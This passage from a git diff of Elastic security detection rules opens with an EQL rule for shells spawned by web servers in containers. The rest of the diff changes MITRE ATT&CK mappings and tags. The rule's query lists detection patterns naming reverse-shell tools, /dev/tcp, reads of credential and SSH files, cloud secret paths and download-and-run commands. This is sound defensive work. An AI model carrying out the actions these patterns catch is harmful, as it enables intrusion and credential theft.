movement from the service container. A typical attacker flow drops a web shell or abuses RCE to launch `sh -c` and pull or run a secondary payload (e.g., reverse shell). + +### Possible investigation steps + +- Capture the full executed command line and decode/normalize any obfuscation (base64, hex, URL encoding) to determine the operator intent and any payload retrieval or reverse-shell behavior. +- Correlate the execution timestamp with web access/error logs and ingress/WAF events to identify the triggering request path, parameters, and source IP/user-agent indicating RCE or web-shell invocation. +- Inspect recent file and permission changes in the container’s application and web directories (including temp and upload paths) to identify newly dropped scripts/binaries, cron entries, or modified server configs. +- Review container and orchestration context (image tag/digest, recent deploys, exec sessions, and Kubernetes events) to determine whether the activity aligns with a legitimate rollout or represents in-container compromise. +- Check network telemetry for the container around the event for suspicious outbound connections, DNS lookups, or downloads, then pivot to any contacted hosts to assess command-and-control or staging infrastructure. + +### False positive analysis + +- A web application or server-side script running under the web-service account legitimately invokes `sh -c` (e.g., to run maintenance tasks like log rotation, cache rebuilds, file conversions, or templating/asset compilation) from a web directory such as `/var/www/*`, causing the web server to spawn a shell child process. +- During container startup or a deployment/health-check routine, the web server process launches a shell via `sh -c` to perform initialization (e.g., environment substitution, dynamic configuration generation, permission fixes, or calling bundled helper scripts), which can resemble exploitation when the parent is a web server and the child is a shell. + +### Response and remediation + +- Immediately isolate the affected container/pod from inbound and outbound traffic (quarantine namespace/security group or apply a deny-all NetworkPolicy) and stop the workload to prevent further `sh -c` execution and potential C2. +- Preserve evidence by exporting the container filesystem and logs (web access/error logs, application logs, and process output) and capture the exact shell command string and any downloaded payloads or newly created files in web roots, temp, and upload directories. +- Eradicate by removing any identified web shells/backdoors and reverting unauthorized changes, then rebuild and redeploy the service from a known-good image digest while rotating secrets exposed to the container (service tokens, database creds, API keys). +- Recover by validating application integrity and behavior post-redeploy (no unexpected shell spawns, no abnormal outbound connections, clean health checks) and monitor the previously contacted IPs/domains for further callbacks from other workloads. +- Escalate to incident response and platform security immediately if the shell command indicates payload retrieval, reverse shell activity, credential access, or if similar `sh -c` executions are observed across multiple containers/namespaces. +- Harden by removing shell binaries from runtime images where feasible, enforcing non-root and read-only filesystems, restricting egress to required destinations only, disabling risky interpreter execution paths in the web app, and adding WAF/RCE protections for the identified vulnerable endpoint.""" +risk_score = 73 +rule_id = "497a7091-0ebd-44d7-88c4-367ab4d4d852" +severity = "high" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where event.type == "start" and event.action == "exec" and process.parent.interactive == false and +container.id like "?*" and ( + process.parent.name in ( + "nginx", "apache2", "httpd", "caddy", "mongrel_rails", "uwsgi", "daphne", "httpd.worker", "flask", + "php-cgi", "php-fcgi", "php-cgi.cagefs", "lswsctrl", "varnishd", "uvicorn", "waitress-serve", "starman" + ) or + process.parent.name like ("php-fpm*", "gunicorn*", "*.cgi", "*.fcgi") or + (process.parent.name like "ruby*" and process.parent.args like~ ("*puma*", "*rails*", "*passenger*")) or + (process.parent.name like "python*" and process.parent.args like~ ( + "*hypercorn*", "*flask*", "*uvicorn*", "*django*", "*app.py*", "*server.py*", "*wsgi.py*", "*asgi.py*" + )) or + (process.parent.name like "perl*" and process.parent.args like~ "*plackup*") or + (process.parent.name == "node" and process.parent.args like~ ( + "*next start*", "*--port*", "*PORT=*", "*HOST=*", "*0.0.0.0*", "*/dist/*.js*", "*/build/*.js*", "*/server/*.js*", + "*/app/*.js*","*/apps/*/*.js*", "*/index.js*", "*/main.js*", "*/srv/*", "*/opt/*", "*/var/www/*" + ) and + not process.parent.args like ("/opt/cursor-agent/*", "/home/*/*", "/root/*", "/opt/vscode-server/*", "/usr/lib/node_modules/openclaw/dist/index.js") + ) or + (process.parent.name == "java" and process.parent.args like~ ( + /* Tomcat */ + "org.apache.catalina.startup.Bootstrap", "-Dcatalina.base=*", + + /* Jetty */ + "org.eclipse.jetty.start.Main", "-Djetty.home=*", + + /* WildFly / JBoss */ + "org.jboss.modules.Main", "-Djboss.home.dir=*", + + /* WebLogic */ + "weblogic.Server", "-Dweblogic.Name=*", "*weblogic-launcher.jar*", + + /* WebSphere traditional + Liberty */ + "com.ibm.ws.runtime.WsServer", "com.ibm.ws.kernel.boot.cmdline.Bootstrap", + + /* GlassFish */ + "com.sun.enterprise.glassfish.bootstrap.ASMain", + + /* Resin */ + "com.caucho.server.resin.Resin", + + /* Spring Boot */ + "org.springframework.boot.loader.*", + + /* Quarkus */ + "*quarkus-run.jar*", "io.quarkus.runner.GeneratedMain", + + /* Micronaut */ + "io.micronaut.runtime.Micronaut", + + /* Dropwizard */ + "io.dropwizard.cli.ServerCommand", + + /* Play */ + "play.core.server.ProdServerStart", + + /* Helidon */ + "io.helidon.microprofile.server.Main", "io.helidon.webserver*", + + /* Vert.x */ + "io.vertx.core.Launcher", + + /* Keycloak */ + "org.keycloak*", + + /* Apereo CAS */ + "org.apereo.cas*", + + /* Elasticsearch */ + "org.elasticsearch.bootstrap.Elasticsearch", + + /* Atlassian / Gerrit */ + "com.atlassian.jira.startup.Launcher", "*BitbucketServerLauncher*", "com.google.gerrit.pgm.Daemon", + + /* Solr */ + "*-Dsolr.solr.home=*" + ) + ) +) and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and +process.args in ("-c", "-cl", "-lc") and ( + process.args like ( + /* Suspicious Paths */ + "* /tmp/* ", "* /var/tmp/* ", "* /dev/shm/*", "* /var/www/*", "* /run/*", "* /var/run/*", + + /* Interpreter Execution */ + "*python* -c*", "*php* -r*", "*perl* -e*", "*ruby* -e*", "*lua* -e*", "*node * -e *", + + /* Encoding / Decoding */ + "*base64 -*d*", "*|*base64 *", "*xxd *", "*openssl*enc * -d *", + + /* Reverse Shells */ + "*netcat *", "* nc *", "*ncat *", "*/dev/tcp*", "*/dev/udp/*", " *socat *", "*openssl*s_client *", "*stty*raw*-echo*", + + /* File Access */ + "*>*/etc/cron*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*", "*~/.ssh/*", "*/etc/shadow*", "*/etc/passwd*", "*chpasswd*", + + /* AWS Credentials */ + "*aws_access_key_id*", "*aws_secret_access_key*", "*aws_session_token*", "*accesskeyid*", "*secretaccesskey*", + "*access_key*", "*.aws/credentials*", "*/.aws/config*", + + /* Azure Credentials */ + "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*", "*AZURE_FEDERATED_TOKEN_FILE*", + "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*", "*/.azure/*", + "*/run/secrets/azure/*", + + /* GCP Credentials */ + "*/.config/gcloud/*", "*application_default_credentials.json*", "*type: service_account*", + "*client_email*", "*private_key_id*", "*private_key*", "*/run/secrets/google/*", "*GOOGLE_APPLICATION_CREDENTIALS*", + + /* Misc. Cloud */ + "*/.docker/config.json*", "*/.npmrc*", "*/secrets/kubernetes.io/serviceaccount/*", + + /* Helpers */ + "*nohup*", "*setsid *", "*timeout *sh -c *", "*disown*", "*env *sh *-c*", + + /* Miscellaneous */ + "*echo *", "*chattr *", "*busybox *", "*#!*", "*chmod +x *", "*chmod 777*", + + /* Decompression */ + "*gzip -*d *", "*bzip2 -*d *", "*xz -*d *", "*tar -*x*", + + /* Path Traversal */ + "*../../../*etc/*", "*/.../*", "*../../../*home/*/*", "*../../../*root/*", + + "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*ruby*", "*|*node*", "*|*lua*", "*|*busybox*" + ) or + ( + process.args like ("*wget *", "*curl *") and ( + ( + process.args like~ ("* -o *", "* --output*", "* -o- *") and + process.args regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" + ) or + ( + process.args like ("*http://*", "*https://*") and + process.args like ( + "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* /var/www/*", "* ~/*", + "* /home/*", "* /run/*", "* /var/run/*" + ) + ) + ) + ) +) and +not ( + (process.parent.name == "nginx" and process.args like ("chmod 777 /etc/resty-*", "resty*")) or + (process.parent.name == "apache2" and ( + process.args in ( + "/usr/local/bin/php -r 'echo phpversion();'", + "/usr/local/bin/php -r 'echo phpversion();'", + "/usr/bin/php -r 'echo phpversion();'" + ) or + process.args like """bash -c "( /home/*/apps/richdocumentscode/collabora/Collabora_Online.AppImage*""" + ) + ) or + (process.parent.name like "php-fpm*" and process.args in ( + "/usr/bin/php -r 'echo phpversion();'", + "/usr/bin/php -r 'echo phpversion();'", + "php -r 'print_r(phpversion());'", + "chattr -i -a /usr/local/virtualizor/license2.php" + ) + ) or + (process.parent.name == "php-cgi" and process.args like ( + "nohup php /home/*/public_html/lockindex.php index.php >/dev/null 2>&1 &", + "nohup php /home/*/public_html/wp-content/* >> /dev/null 2>&1 &", + "nohup php /home/*/public_html/wp-includes/* >> /dev/null 2>&1 &", + "nohup php /home/*/public_html/*/wp-content/* >> /dev/null 2>&1 &" + ) + ) +) +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Persistence" +id = "TA0003" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml index 6fa3c4dc37a..92c6ca0ff81 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -48,3 +48,23 @@ event.dataset:cyberarkpas.audit and event.type:error ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml index a57b73397a5..ae927878370 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -51,3 +51,23 @@ event.dataset:cyberarkpas.audit and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml index 1080888e570..cd93d27121e 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 @@ -44,7 +44,13 @@ The Data Exfiltration Detection integration detects data exfiltration activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Data Exfiltration Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -83,26 +89,14 @@ Machine learning models analyze network traffic to identify anomalies, such as d - Implement enhanced monitoring on the affected system and network segment to detect any further suspicious activity.""" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1571" -name = "Non-Standard Port" -reference = "https://attack.mitre.org/techniques/T1571/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml index fc59e19bd27..8e885a4b26b 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 @@ -89,18 +89,14 @@ The detection rule leverages machine learning to identify anomalies in data tran - Consider deploying endpoint detection and response (EDR) solutions to enhance visibility and control over data movements to external devices.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" -[[rule.threat.technique.subtechnique]] -id = "T1052.001" -name = "Exfiltration over USB" -reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml index 321ed5158e3..d0c800d51aa 100644 --- a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 @@ -89,18 +89,14 @@ In modern environments, processes may write data to external devices for legitim - Update security policies and controls to prevent similar exfiltration attempts, such as restricting process permissions to write to external devices and enhancing endpoint protection measures.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" -[[rule.threat.technique.subtechnique]] -id = "T1052.001" -name = "Exfiltration over USB" -reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml index 411f171e203..afcf159faef 100644 --- a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml +++ b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 70 @@ -96,18 +96,14 @@ Domain Generation Algorithms (DGAs) are used by malware to dynamically generate - Escalate to incident response team: If the threat is confirmed and widespread, escalate the incident to the organization's incident response team for further investigation and coordinated response efforts.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" -[[rule.threat.technique.subtechnique]] -id = "T1568.002" -name = "Domain Generation Algorithms" -reference = "https://attack.mitre.org/techniques/T1568/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/integrations/fim/persistence_suspicious_file_modifications.toml b/rules/integrations/fim/persistence_suspicious_file_modifications.toml index 98869db8820..4ef9a45946f 100644 --- a/rules/integrations/fim/persistence_suspicious_file_modifications.toml +++ b/rules/integrations/fim/persistence_suspicious_file_modifications.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["fim"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/04" [rule] author = ["Elastic"] @@ -47,7 +47,17 @@ To configure the Elastic FIM integration, follow these steps: For more details on configuring the Elastic FIM integration, you can refer to the [Elastic FIM documentation](https://docs.elastic.co/integrations/fim). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: File Integrity Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: File Integrity Monitoring", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -210,39 +220,24 @@ name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" [[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.006" -name = "Systemd Timers" -reference = "https://attack.mitre.org/techniques/T1053/006/" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" [[rule.threat.technique.subtechnique]] -id = "T1098.004" -name = "SSH Authorized Keys" -reference = "https://attack.mitre.org/techniques/T1098/004/" +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" [[rule.threat.technique]] -id = "T1542" -name = "Pre-OS Boot" -reference = "https://attack.mitre.org/techniques/T1542/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1542.003" -name = "Bootkit" -reference = "https://attack.mitre.org/techniques/T1542/003/" +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [[rule.threat.technique]] id = "T1543" @@ -254,46 +249,11 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.017" -name = "Udev Rules" -reference = "https://attack.mitre.org/techniques/T1546/017/" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.013" -name = "XDG Autostart Entries" -reference = "https://attack.mitre.org/techniques/T1547/013/" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -312,6 +272,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -326,3 +296,29 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml index f97dd000f8a..2f2e473a30c 100644 --- a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml +++ b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -82,3 +82,16 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml index b7893e2fc97..6999cef9783 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -87,18 +87,14 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml index dc90f3eb665..6ac6b9d0085 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -84,18 +84,14 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml index 8e59ea4e070..3afdc0d904e 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -87,18 +87,14 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.ap [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml index 427c2ce5776..0959ed9e33e 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -84,18 +84,14 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml index 38802e77eaa..36bd43f1c07 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -81,18 +81,14 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml index 3f132004437..b232902cc6d 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -64,7 +64,14 @@ references = ["https://cloud.google.com/pubsub/docs/overview"] risk_score = 21 rule_id = "cc89312d-6f47-48e4-a87c-4977bd4633c3" severity = "low" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data 